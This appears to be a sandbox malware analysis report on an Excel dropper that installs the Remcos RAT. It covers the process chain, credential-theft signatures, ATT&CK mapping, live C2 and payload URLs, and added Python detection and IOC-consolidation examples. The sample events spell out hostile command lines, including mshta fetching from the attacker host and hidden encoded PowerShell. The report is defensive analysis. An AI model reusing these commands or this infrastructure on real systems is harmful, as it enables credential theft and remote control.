                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Paltalk
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Identities\{56EE7341-F593-4666-B32B-0DA2F15C6755}\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4add
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: ESMTPPassword30_2_004033F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword30_2_00402DB3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword30_2_00402DB3
                  Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 2392, type: MEMORYSTR

                  Remote Access Functionality

                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-Z4DJFI
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-Z4DJFI
                  Source: Yara matchFile source: 32.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 32.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000020.00000002.555858192.0000000000585000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000020.00000002.555239119.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 3640, type: MEMORYSTR
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: cmd.exe32_2_00405042
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information121
                  Scripting
                  Valid Accounts11
                  Native API
                  121
                  Scripting
                  1
                  DLL Side-Loading
                  1
                  Deobfuscate/Decode Files or Information
                  2
                  OS Credential Dumping
                  2
                  System Time Discovery
                  Remote Services11
                  Archive Collected Data
                  13
                  Ingress Tool Transfer
                  Exfiltration Over Other Network Medium1
                  System Shutdown/Reboot
                  CredentialsDomainsDefault Accounts23
                  Exploitation for Client Execution
                  1
                  DLL Side-Loading
                  1
                  Bypass User Account Control
                  21
                  Obfuscated Files or Information
                  111
                  Input Capture
                  1
                  Account Discovery
                  Remote Desktop Protocol1
                  Data from Local System
                  21
                  Encrypted Channel
                  Exfiltration Over Bluetooth1
                  Defacement
                  Email AddressesDNS ServerDomain Accounts123
                  Command and Scripting Interpreter
                  1
                  Windows Service
                  1
                  Access Token Manipulation
                  1
                  Install Root Certificate
                  2
                  Credentials in Registry
                  1
                  System Service Discovery
                  SMB/Windows Admin Shares21
                  Email Collection
                  1
                  Non-Standard Port
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal Accounts2
                  Service Execution
                  Login Hook1
                  Windows Service
                  1
                  DLL Side-Loading
                  3
                  Credentials In Files
                  4
                  File and Directory Discovery
                  Distributed Component Object Model111
                  Input Capture
                  1
                  Remote Access Software
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud Accounts3
                  PowerShell
                  Network Logon Script321
                  Process Injection
                  1
                  Bypass User Account Control
                  LSA Secrets39
                  System Information Discovery
                  SSH4
                  Clipboard Data
                  2
                  Non-Application Layer Protocol
                  Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  Masquerading
                  Cached Domain Credentials3
                  Security Software Discovery
                  VNCGUI Input Capture213
                  Application Layer Protocol
                  Data Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
                  Virtualization/Sandbox Evasion
                  DCSync21
                  Virtualization/Sandbox Evasion
                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                  Access Token Manipulation
                  Proc Filesystem3
                  Process Discovery
                  Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt321
                  Process Injection
                  /etc/passwd and /etc/shadow1
                  Application Window Discovery
                  Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                  System Owner/User Discovery
                  Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                  Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchdStripped PayloadsInput Capture1
                  Remote System Discovery
                  Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
Behavior Graph (ID 1567364; sample 0200011080.xls; start date 03/12/2024; architecture WINDOWS; score 100)

Graph-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 20 other signatures.

Process tree (numbers are the graph's node IDs; network, dropped-file and signature annotations are listed under the node they were attached to):

2  0200011080.xls
└─ 12 EXCEL.EXE
     network: 142.93.65.161 (ports 49166, 49168, 49169; DIGITALOCEAN-ASN, United States); short.ruksk.com 54.150.207.131:443 (ports 49165, 49167; AMAZON-02, United States)
     dropped: C:\Users\user\Desktop\0200011080.xls (copy), Composite; niceworkingpersonw...eisbeautiful[1].hta, HTML
     signatures: Microsoft Office drops suspicious files
     ├─ 17 mshta.exe
     │    network: short.ruksk.com
     │    signatures: Suspicious command line found; PowerShell case anomaly found
     │    └─ 23 cmd.exe
     │         signatures: Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); PowerShell case anomaly found
     │         └─ 28 powershell.exe
     │              dropped: weneedkissingwello...riendshebeautif.vbS, Unicode; C:\Users\user\AppData\...\sietgs52.cmdline, Unicode
     │              signatures: Installs new ROOT certificates
     │              ├─ 34 wscript.exe
     │              │    signatures: Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); Windows Scripting host queries suspicious COM object (likely to drop second stage); Suspicious execution chain found
     │              │    └─ 44 powershell.exe
     │              │         network: res.cloudinary.com
     │              │         signatures: Writes to foreign memory regions; Injects a PE file into a foreign processes
     │              │         └─ 54 CasPol.exe
     │              │              network: apamanollonan.duckdns.org 31.13.224.72:4044 (ports 49178, 49179; SARNICA-AS, Bulgaria; Uses dynamic DNS services); geoplugin.net 178.237.33.50:80 (port 49180; ATOM86-AS ATOM86, Netherlands)
     │              │              signatures: Contains functionality to bypass UAC (CMSTPLUA); Detected Remcos RAT; Tries to steal Mail credentials (via file registry); 6 other signatures
     │              │              ├─ 60 CasPol.exe: Tries to steal Instant Messenger accounts or passwords; Tries to steal Mail credentials (via file / registry access); Searches for Windows Mail specific files
     │              │              ├─ 63 CasPol.exe: Tries to harvest and steal browser information (history, passwords, etc)
     │              │              └─ 65 CasPol.exe
     │              └─ 37 csc.exe
     │                   dropped: C:\Users\user\AppData\Local\...\sietgs52.dll, PE32
     │                   └─ 48 cvtres.exe
     └─ 21 mshta.exe
          network: short.ruksk.com
          └─ 26 cmd.exe
               └─ 32 powershell.exe
                    ├─ 40 wscript.exe
                    │    └─ 50 powershell.exe
                    │         network: cloudinary.map.fastly.net 151.101.65.137:443 (port 49176; FASTLY, United States); res.cloudinary.com
                    │         └─ 58 CasPol.exe
                    └─ 42 csc.exe
                         dropped: C:\Users\user\AppData\Local\...\tc3erle0.dll, PE32
                         └─ 52 cvtres.exe

The two mshta.exe branches (nodes 17 and 21) run the same stages in parallel. The final payload is never written to disk as an executable: the second-stage PowerShell (nodes 44 and 50) injects a PE into CasPol.exe, the .NET Code Access Security Policy tool, and the Remcos behaviour (C2 over dynamic DNS on port 4044, geoplugin.net lookup, credential theft) is observed in those CasPol.exe processes. CasPol.exe launched by powershell.exe is therefore the most distinctive process-creation event in the chain.
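The chain above reads naturally as a set of parent/child rules over process-creation telemetry. The following is an added example, not part of the Joe Sandbox report: a small Python detector run over constructed Sysmon-style events that mirror the graph's node IDs. Command lines, file paths and the benign control process are hypothetical, and the rule names are this example's own.

```python
"""
Detect the execution chain shown in the behaviour graph:
Office -> mshta -> cmd -> PowerShell -> wscript/csc -> PowerShell -> CasPol.exe.

Added example, not part of the Joe Sandbox report. SAMPLE_EVENTS are
constructed to mirror the graph's node IDs; command lines and paths are
hypothetical, and the rule names are this example's own.
"""
import re
from collections import namedtuple

Event = namedtuple("Event", "pid ppid image cmdline")

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
# Casings a human or an honest script normally types; anything else (pOwErShElL) is an evasion tell.
USUAL_PS_CASINGS = {"powershell", "Powershell", "PowerShell", "POWERSHELL"}
# csc.exe fed a .cmdline response file from a user-writable directory (Sigma: "Dot net compiler compiles file from suspicious location").
COMPILE_FROM_USER_DIR = re.compile(r'\\appdata\\[^\s"]*\.cmdline', re.I)


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def powershell_case_anomaly(cmdline):
    """True when 'powershell' appears in a casing nobody types by hand."""
    return any(m.group(0) not in USUAL_PS_CASINGS
               for m in re.finditer(r"(?i)\bpowershell\b", cmdline))


def ancestry(event, by_pid):
    """Image names of the event, its parent, grandparent, ... (loop-safe)."""
    names, seen, cur = [], set(), event
    while cur is not None and cur.pid not in seen:
        seen.add(cur.pid)
        names.append(basename(cur.image))
        cur = by_pid.get(cur.ppid)
    return names


def analyse(events):
    """Return (pid, rule) findings for every event that matches a chain rule."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        chain = ancestry(e, by_pid)
        img, parent = chain[0], (chain[1] if len(chain) > 1 else None)
        if img in SCRIPT_HOSTS and parent in OFFICE_APPS:
            findings.append((e.pid, "office_spawns_script_host"))
        if img == "powershell.exe" and any(a in SCRIPT_HOSTS for a in chain[1:]):
            findings.append((e.pid, "script_host_to_powershell"))
        if img == "powershell.exe" and powershell_case_anomaly(e.cmdline):
            findings.append((e.pid, "powershell_case_anomaly"))
        if img == "csc.exe" and parent == "powershell.exe" and COMPILE_FROM_USER_DIR.search(e.cmdline):
            findings.append((e.pid, "dotnet_compile_from_appdata"))
        if img == "caspol.exe" and parent == "powershell.exe":
            findings.append((e.pid, "caspol_spawned_by_powershell"))
    return findings


# Constructed events; PIDs follow the behaviour graph's node IDs, everything else is hypothetical.
SAMPLE_EVENTS = [
    Event(12, 2,  r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE", '"EXCEL.EXE" 0200011080.xls'),
    Event(17, 12, r"C:\Windows\System32\mshta.exe", "mshta.exe https://short.ruksk.com/MJoi1u"),
    Event(23, 17, r"C:\Windows\System32\cmd.exe", "cmd /c pOwErShElL -w hidden -enc SQBFAFgA"),
    Event(28, 23, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "pOwErShElL -w hidden -enc SQBFAFgA"),
    Event(34, 28, r"C:\Windows\System32\wscript.exe", r'wscript.exe "C:\Users\user\AppData\Roaming\stage2.vbS"'),
    Event(37, 28, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe",
          r'csc.exe /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\k2m9x1aa.cmdline"'),
    Event(44, 34, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell -NoProfile -c <loader>"),
    Event(54, 44, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe", "CasPol.exe"),
    # benign control: an interactive shell whose parent (pid 5, explorer.exe) is not in the event set
    Event(90, 5,  r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell.exe"),
]

if __name__ == "__main__":
    for pid, rule in analyse(SAMPLE_EVENTS):
        print(f"pid {pid:>3}: {rule}")
```

The ancestry walk is what makes the rules hold up against this sample: node 44's direct parent is wscript.exe, but node 28's is cmd.exe, so a parent-only rule would miss one of the two PowerShell stages while the walk to the Office root catches both.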

Antivirus detection

Source | Detection | Scanner
0200011080.xls | 14% | ReversingLabs
0200011080.xls | 100% | Joe Sandbox ML

No Antivirus matches for the remaining scanner tables.
URL scanner results

Source | Detection | Scanner | Label
http://142.93.65.161/680/weneedk | 0% | Avira URL Cloud | safe
http://142.93.65.161/680/weneedkissingwellongirlfriendshebeautifulgirl.tIF | 0% | Avira URL Cloud | safe
http://142.93.65.161/xampp/ws/niceworkingpersonwithhergirlfriendsheisbeautiful.hta...r | 0% | Avira URL Cloud | safe
http://crl.pkioverheIi | 0% | Avira URL Cloud | safe
http://142.93.65.161/xampp/ws/niceworkingpersonwithhergirlfriendsheisbeautiful.hta...rTm | 0% | Avira URL Cloud | safe
http://142.93.65.161/xampp/ws/niceworkingpersonwithhergirlfriendsheisbeautiful.htard=wee&pacemaker | 0% | Avira URL Cloud | safe
http://142.93.65.161/xampp/ws/niceworkingpersonwithhergirlfriendsheisbeautiful.hta... | 0% | Avira URL Cloud | safe
http://142.93.65.161/680/weneedkissingwellongirlfriendshebeautifulgirl.tIFa%0I | 0% | Avira URL Cloud | safe
http://142.93.65.161/xampp/ws/niceworkingpersonwithhergirlfriendsheisbeautiful.htay | 0% | Avira URL Cloud | safe
http://142.93.65.161/680/SRVRER.txt | 0% | Avira URL Cloud | safe
http://142.93.65.161/680/weneedkissingwellongirlfriendshebeautifulgirl.tIFp | 0% | Avira URL Cloud | safe
https://short.ruksk.com/Dat | 0% | Avira URL Cloud | safe
https://short.ruksk.com/us | 0% | Avira URL Cloud | safe
http://142.93.65.161/680/weneedkissingwellongirlfriendshebeautifulgirl.tIFA | 0% | Avira URL Cloud | safe
lonan.duckdns.org | 0% | Avira URL Cloud | safe
https://short.ruksk.com/MJoi1u?&hosiery=imminent&basketball=innate&greece=brash&board=wee&pacemaker_ | 0% | Avira URL Cloud | safe
http://142.93.65.161/680/weneedkissingwellongirlfriendshebeautifulgirl.tIF1 | 0% | Avira URL Cloud | safe
https://short.ruksk.com/MJoi1u?&hosiery=imminent&basketball=innate&greece=brash&board=wee&pacemakerX | 0% | Avira URL Cloud | safe
http://142.93.65.161/ | 0% | Avira URL Cloud | safe
http://142.93.65.161/xampp/ws/niceworkingpersonwithhergirlfriendsheisbeautiful.htapC: | 0% | Avira URL Cloud | safe
https://short.ruksk.com/MJoi1u?&hosiery=imminent&basketball=innate&greece=brash&board=wee&pacemakerL | 0% | Avira URL Cloud | safe
http://142.93.65.161/xampp/ws/niceworkingpersonwithhergirlfriendsheisbeautiful.hta | 0% | Avira URL Cloud | safe
http://142.93.65.161/xampp/ws/niceworkingpersonwithhergirlfriendsheisbeautiful.htard=wee&XKy | 0% | Avira URL Cloud | safe
https://short.ruksk.com/MJoi1u?&hosiery=imminent&basketball=innate&greece=brash&board=wee&pacemakerO | 0% | Avira URL Cloud | safe
https://short.ruksk.com/MJoi1u?&hosiery=imminent&basketball=innate&greece=brash&board=wee&pacemakerI | 0% | Avira URL Cloud | safe
http://142.93.65.161/xampp/ws/niceworkingpersonwithhergirlfriendsheisbeautiful.htacC: | 0% | Avira URL Cloud | safe
https://short.ruksk.com/MJoi1u?&hosiery=imminent&basketball=innate&greece=brash&board=wee&pacemakerA | 0% | Avira URL Cloud | safe
http://142.93.65.161/6 | 0% | Avira URL Cloud | safe
http://142.93.65.161/xampp/ws/niceworkingpersonwithhergirlfriendsheisbeautiful.htak | 0% | Avira URL Cloud | safe
https://short.ruksk.com/MJoi1u?&hosiery=imminent&basketball=innate&greece=brash&board=wee&pacemaker/ | 0% | Avira URL Cloud | safe
http://142.93.65.161/xampp/ws/niceworkingpersonwithhergirlfriendsheisbeautiful.htaG | 0% | Avira URL Cloud | safe
http://142.93.65.161/xampp/ws/niceworkingpersonwithhergirlfriendsheisbeautiful.htahttp://142.93.65.1 | 0% | Avira URL Cloud | safe
https://short.ruksk.com/ | 0% | Avira URL Cloud | safe
http://142.93.65.161/680/weneedkissingwellongirlfriendshebeautifulgirl.tIFC: | 0% | Avira URL Cloud | safe
http://142.93.65.161/xampp/ws/niceworkingpersonwithhergirlfriendsheisbeautiful.hta...0n | 0% | Avira URL Cloud | safe

Avira URL Cloud rated every URL in this list "safe" (0%), including the 142.93.65.161 host that served the .hta and .tIF stages and the short.ruksk.com redirector embedded in the spreadsheet. URL reputation lags newly stood-up infrastructure; the network indicators should be treated as malicious on the strength of the behaviour observed in this analysis, not on the reputation verdict. Note also that most entries are the same two payload URLs with trailing bytes carved from process memory (".htard=wee&pacemaker", ".tIFa%0I"), not distinct URLs.
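Carved strings such as those above should be consolidated before they become blocklist entries. The following is an added example, not part of the Joe Sandbox report: Python that maps memory-carved strings onto the confirmed URLs and domains this report lists, splitting glued strings and attributing truncated ones. The carved inputs are copied from this report's tables; the prefix-length threshold is this example's own assumption.

```python
"""
Consolidate URL strings carved from process memory into actionable IOCs.

Added example, not part of the Joe Sandbox report. Memory carving yields the
payload URL plus trailing bytes ("...hta" + "rd=wee&pacemaker"), cut-short
prefixes ("http://142.93.65.161/680/weneedk") and adjacent strings glued
together. CARVED, CONFIRMED and KNOWN_HOSTS are copied from this report's
tables; MIN_PREFIX_LEN is this example's own threshold.
"""
import re
from urllib.parse import urlsplit

SCHEME_START = re.compile(r"(?=https?://)")  # zero-width: splits "http://ahttp://b" in two
MIN_PREFIX_LEN = 24  # a carved prefix shorter than this is too ambiguous to attribute (assumption)

HTA_URL = "http://142.93.65.161/xampp/ws/niceworkingpersonwithhergirlfriendsheisbeautiful.hta"
TIF_URL = "http://142.93.65.161/680/weneedkissingwellongirlfriendshebeautifulgirl.tIF"

# Confirmed by network traffic in this report.
CONFIRMED = [HTA_URL, TIF_URL, "http://142.93.65.161/680/SRVRER.txt", "http://geoplugin.net/json.gp"]
KNOWN_HOSTS = ["apamanollonan.duckdns.org", "short.ruksk.com", "142.93.65.161", "geoplugin.net"]

# Strings as they appear in the report's memory-carved URL tables.
CARVED = [
    HTA_URL + "rd=wee&pacemaker",
    HTA_URL + "http://142.93.65.1",           # glued to the next, truncated, string
    TIF_URL + "a%0I",
    "http://142.93.65.161/680/weneedk",
    "http://142.93.65.161/",
    "http://crl.pkioverheIi",                 # truncated CRL host, benign noise
    "lonan.duckdns.org",                      # tail of the C2 hostname
    "https://short.ruksk.com/MJoi1u?&hosiery=imminent&basketball=innate&greece=brash&board=wee&pacemaker_",
    "http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com",  # stealer-module strings
]


def split_glued(s):
    """Split a memory string at every scheme start; a string without a scheme is returned whole."""
    return [p for p in SCHEME_START.split(s) if p] or [s]


def match_url(carved, confirmed):
    """Longest confirmed URL that the carved string extends, or is a long-enough prefix of."""
    best = None
    for c in confirmed:
        hit = carved.startswith(c) or (len(carved) >= MIN_PREFIX_LEN and c.startswith(carved))
        if hit and (best is None or len(c) > len(best)):
            best = c
    return best


def host_of(s):
    """Hostname of a URL; a bare string is treated as a hostname fragment."""
    return (urlsplit(s if "://" in s else "//" + s).hostname or "").lower()


def match_host(fragment, known_hosts):
    """A carved fragment that is the tail of a known host ('lonan.duckdns.org')."""
    return next((h for h in known_hosts if fragment and h.endswith(fragment)), None)


def consolidate(carved, confirmed=CONFIRMED, known_hosts=KNOWN_HOSTS):
    """Return canonical URLs (with the variants they absorb), hosts, and the leftovers."""
    urls, hosts, leftovers = {}, set(), []
    for raw in carved:
        for s in split_glued(raw):
            url = match_url(s, confirmed)
            if url:
                urls.setdefault(url, []).append(s)
                hosts.add(host_of(url))
                continue
            host = match_host(host_of(s), known_hosts)
            if host:
                hosts.add(host)
            else:
                leftovers.append(s)  # review by hand; do not block blindly
    return {"urls": urls, "hosts": hosts, "leftovers": leftovers}


if __name__ == "__main__":
    result = consolidate(CARVED)
    for url, variants in result["urls"].items():
        print(f"{url}  <- {len(variants)} carved variant(s)")
    print("hosts:", sorted(result["hosts"]))
    print("leftovers:", result["leftovers"])
```

The leftovers are the point of the exercise: the truncated CRL host and the imvu/ebuddy/google strings come from the certificate chain and the stealer module's target list, and would be false positives on a blocklist, while "lonan.duckdns.org" is only useful once it is attributed to the full apamanollonan.duckdns.org C2 name.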
Contacted domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
apamanollonan.duckdns.org | 31.13.224.72 | true | true | | unknown
geoplugin.net | 178.237.33.50 | true | false | | high
cloudinary.map.fastly.net | 151.101.65.137 | true | false | | high
short.ruksk.com | 54.150.207.131 | true | false | | unknown
res.cloudinary.com | unknown | unknown | false | | high

Only the dynamic-DNS C2 name is flagged malicious. geoplugin.net (queried by the injected CasPol.exe) and res.cloudinary.com (fetched by the second-stage PowerShell) are legitimate services with high reputation that are being abused for a geolocation lookup and payload hosting; they are part of the chain in this process context but are poor candidates for a domain blocklist. short.ruksk.com, the redirector embedded in the spreadsheet, is rated "unknown", not malicious.
Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://142.93.65.161/680/weneedkissingwellongirlfriendshebeautifulgirl.tIF | true | Avira URL Cloud: safe | unknown
http://142.93.65.161/680/SRVRER.txt | true | Avira URL Cloud: safe | unknown
lonan.duckdns.org | true | Avira URL Cloud: safe | unknown
https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg | false | | high
http://142.93.65.161/xampp/ws/niceworkingpersonwithhergirlfriendsheisbeautiful.hta | true | Avira URL Cloud: safe | unknown
http://geoplugin.net/json.gp | false | | high
URLs from memory and binary data

Name | Source | Malicious | Antivirus Detection | Reputation
http://crl.pkioverheIi | powershell.exe, 00000007.00000002.474546983.000000001C364000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.imvu.comr | CasPol.exe, 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | | high
http://142.93.65.161/680/weneedk | powershell.exe, 00000007.00000002.467820686.0000000002594000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.499810498.0000000002583000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_167%2Cw_312%2Cc_fill%2Cg_faces%2Ce_ | bhv5265.tmp.29.dr | false | | high
https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1 | bhv5265.tmp.29.dr | false | | high
https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpgX | powershell.exe, 0000000C.00000002.523814321.00000000022C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.557478401.0000000002340000.00000004.00000800.00020000.00000000.sdmp | false | | high
